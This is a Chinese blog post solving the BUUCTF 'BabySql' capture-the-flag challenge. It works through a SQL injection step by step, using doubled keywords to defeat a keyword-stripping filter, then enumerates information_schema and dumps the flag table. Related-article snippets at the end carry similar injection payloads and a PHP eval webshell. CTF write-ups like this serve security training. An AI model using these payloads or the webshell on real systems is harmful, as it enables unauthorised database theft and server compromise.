BUUCTF WEB BabySql

最新推荐文章于 2024-03-03 14:21:53 发布
最新推荐文章于 2024-03-03 14:21:53 发布
阅读量276 收藏
点赞数
分类专栏: BUUCTF 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41696858/article/details/120081953
版权

题其实没什么,就是一个双写绕过waf的问题
按照常理,admin’ 123监测是否单引号闭合,直接给出注入点,且有回显
经过测试,waf过滤了or,by那么爆破列数的时候(直接输入order by 1会回显der 1):
admin’ oorrder bbyy 1#
测试到4的时候会出现unknown_column,那么列数是3
-1’ ununionion selselectect 1,2,3#
下面爆破数据库,union select同样被过滤,同样双写
-1’ ununionion selselectect 1,database(),3# 当前数据库是geek
from,where被过滤
-1’ ununionion selselectect 1,group_concat(table_name),3 frfromom infoorrmation_schema.tables whwhereere table_schema=‘geek’ #
很遗憾,flag并不在当前数据库,那么找找flag在哪,以列名为标准,爆破数据库,爆出来在ctf库
-1’ ununionion seselectlect 1,group_concat(table_schema),3 frfromom infoorrmation_schema.columns whwhereere COLUMN_NAME LIKE ‘%flag%’ #
那么查找ctf库的表名,只有一张表,Flag
-1’ ununionion seselectlect 1,group_concat(table_name),3 frfromom infoorrmation_schema.tables whwhereere table_schema=‘ctf’ #
查找Flag表的列名:只有一列flag
-1’ ununionion seselectlect 1,group_concat(column_name),3 frfromom infoorrmation_schema.columns whwhereere table_name=‘Flag’ #
爆破flag
-1’ ununionion seselectlect 1,group_concat(flag),3 frfromom ctf.Flag#
参考视频链接:https://www.bilibili.com/video/BV16w411f7yF/

显哥无敌
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF-Web】[极客大挑战 2019]BabySQL
weixin_49298681的博客
01-05 245
1.根据提示知道sql注入有严格的过滤;再通过尝试找到绕过的方法为藏字符2.直接获得username和password 但是没有有用的信息3.通过order by的报错知晓有多少列:root =4.寻找回显点:root =>5.获得数据库基本信息:root =>6.通过information_schema数据库爆破table_name + column_names1.root =2.root =7.再根据知道的column_names去获取数据1.root =
BUUCTF部分web题目
最新发布
05-06
写题记录
BUUCTF - web - BabySQL
1tachi的博客
11-04 233
文章目录判断注入类型判断字段数判断回显点查表查字段查数据 判断注入类型 尝试万能密码:'1 or 1=1 -- qwe 发现仅剩下1=1 -- qwe,可能ban掉了"or"关键词 尝试双写:1' oorr 1=1 -- qwe 登陆成功,可能以后都要双写了 判断字段数 1' oorrder bbyy 3 -- qwe 看来有三个字段 判断回显点 1' ununionion seselectlect 1,2,3 -- qwe 回显点是2和3 查表 1' ununionion seselectlect
BUUCTF---[极客大挑战 2019]BabySQL1
2201_75556700的博客
03-03 613
1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#使用该语句查表名时发现union,select,from,where都被过滤了。8.这里没有得到flag可能是我遗漏了什么,查了资料才发现,flag可能不在我们当前这个数据库里面,想到一开始,我还没查询库名,不知道它有几个苦命,于是使用下面命令进行数据库库名查询。使用下面命令爆第一张表的字段。
BUUCTF web [GXYCTF2019]BabyUpload1 详解
llki666的博客
08-27 2201
打开后是这样的, 遇到文件上传题,先传一张普通图片试试, 提到了上传类型,用burpsuite抓包可以修改上传类型。再试试上传一句话木马: 提到后缀名不能有ph,也用burp suite能改。 准备一个文本文档写一句话木马: <script language='php'>eval($_POST['v']);</script> 推荐用这个,可以避开很多坑。然后直接把文本的后缀名txt改成jpg就行。 上传试试: 成功!现在需要把上传成功...
BUUCTFweb方向题目记录(二)
热门推荐
wanan的博客
10-06 2万+
BUUCTFweb方向题目记录(二)
CTF中Web题目的各种基础的思路-----入门篇十分的详细
m0_64815693的博客
09-13 2万+
想学习CTF-web这里给你一个思路,给你一个方向
2021暨南大学CTF新生杯(Web篇)
恒Keep毅
12-03 4603
目录【1星????】baby_sql【3星????】checkin相关链接弱语言判断科学技术法绕过字符串绕过【1星????】baby-upload【2星????】baby-unserialize绕过wake_up十六进制绕过【2星????】easy-sql构建tamper手动注入【2星????】easy_js处理十六进制的JS源码阅读JS源码控制台修改【2星????】easy-upload伪造后缀名字上传一句话以及菜刀拿到flag【4星????】easy-rce仅能函数执行?我该怎么绕过读取文件呢?【3星?
BUUCTFweb之强网杯2019随便注
12-14
开始注入: 1’ : 报错 1’ #:回显正常 1’ order by 1 #: 正常(经测试列数为2–此处小白暗自窃喜) 1’ union select 1,2#: 回显 如图 看来此方法是行不通了,但经过苦苦寻求,了解到了堆叠注入: ...
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
变量覆盖漏洞 自定义的参数值替换原有变量值的情况称为变量覆盖漏洞 经常导致变量覆盖漏洞场景有:$使用不当,extract()函数使用不当,parse_str()函数使用不当,import_request_variables()使用不当,开启了全局...
BUUCTF逆向前八题
01-24
内容为BUUCTF里reserve的前八题自己的一些解题思路
BasicASM.s(BUUCTF
06-04
分析过程文件
BMZCTF:baby_sql
末初的CSDN博客
04-30 646
http://www.bmzclub.cn/challenges#baby_sql 简单的SQL注入,过滤了一些关键字符,但是过滤进制都是直接替换为空。有机可趁,直接双写绕过 /check.php?username=mochu7'oorrder/**/bbyy/**/4%23&password=mochu7 /check.php?username=mochu7'uniunionon/**/selselectect/**/1,2,3%23&password=mochu7 /chec
BUUCTF[极客大挑战 2019]BabySQL
rumil的博客
06-25 1850
通过输入非0数字,能正常回显,0和字母不能正常回显,什么都没有显示。刚刚我们输入非0数字正常回显,0和字母不能正常的回显,猜测说明sql语句当中可能存在||运算符,只有输入非0数字,才会返回true,回显条件。可观察网页的源码信息,发现有check.php,猜测可能是登录界面时,输入账号和密码的跳转界面,提示信息。通过上面的过程我们不难发现,此时还存在过滤,from和where也被过滤,同理双写绕过。拿到该靶机,观察界面,存在登录说明存在可能SQL注入,根据题目也可得知存在SQL注入。
buuctf-[极客大挑战 2019]BabySQL(小宇特详解)
小宇的web博客
01-19 5021
buuctf-[极客大挑战 2019]BabySQL(小宇特详解) 这里看题的话是一道SQL注入。 这里先尝试一下万能密码 这里发现它过滤了or(直接删除了or) 这里尝试进行双写 也就是oorr,这里删除了or后又重新构造了一个or 这里发现还是不行 这里先看一下双写union select 1 /check.php?username=admin&password=1 %27 ununionion seselectlect 1 %23 这里发现不是报错,而是列数不对 当列数为3的时候对
buuctf[极客大挑战 2019]BabySQL--联合注入、双写过滤
weixin_61060664的博客
01-10 1392
有回显: The used SELECT statements have a different number of columns。有回显:版本为:“ 10.3.18-MariaDB!1' or'1'='1 失败。有回显,字段名为flag。
BUUCTF--[GXYCTF2019]BabySQli详解
x1520700的博客
05-23 2622
题目预备知识 mysql在查询不存在的数据时会自动构建虚拟数据,一般数据要么明文,要么MD5,源码上用的是md5加密了密码 当没有回显字段时,只能猜测三个字段类型分别为id,username,password 1、经过题目名提示,猜测应该是SQL注入,进入题目,发现一个登录框功能板,确信应该就是SQL注入,开始注入; 这里分享一个小知识点: sql注入可能出现的功能点 登录页面,留言板,修改信息,获取http请求头(User-agent,referer,xff)等只要是和数据库存在交...
BUUCTF WEB Babysqli1
qq_41696858的博客
10-18 177
这题考的是sql注入 打开场景,一个登录界面 先尝试下,admin’,根据回显判断,用户名是admin没错,而且是单引号闭合 尝试万能密码,admin’ or ‘1’=‘1,发现是don’t hack me看来是有waf 但是尝试union这类词,发现他能过waf,那么尝试联合注入看看 首先要确定列数,不幸的是order触发了waf,需要大小写绕过 admin’ Order by 3#和admin’ Order by4#回显不一样,那么可以确认是三列 下面确定admin在那一列, a’ union sele
buuctf 极客大挑战 babysql
SopRomeo的博客
01-17 1669
emmmmm这道题,常规注入不可行,很明显过滤了什么字符,我试了下双写,没想到可行。。 接着就直接上图吧 跟之前lovesql差不多
buuctf web
08-15
回答:根据引用和引用的内容,buuctf web应该是指buuctf比赛中的一个web题目。其中可能涉及到Tornado作为非阻塞式服务器的使用,以及render函数的使用。而根据引用的内容,buuctf web题目可能存在一些漏洞,比如SSRF...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值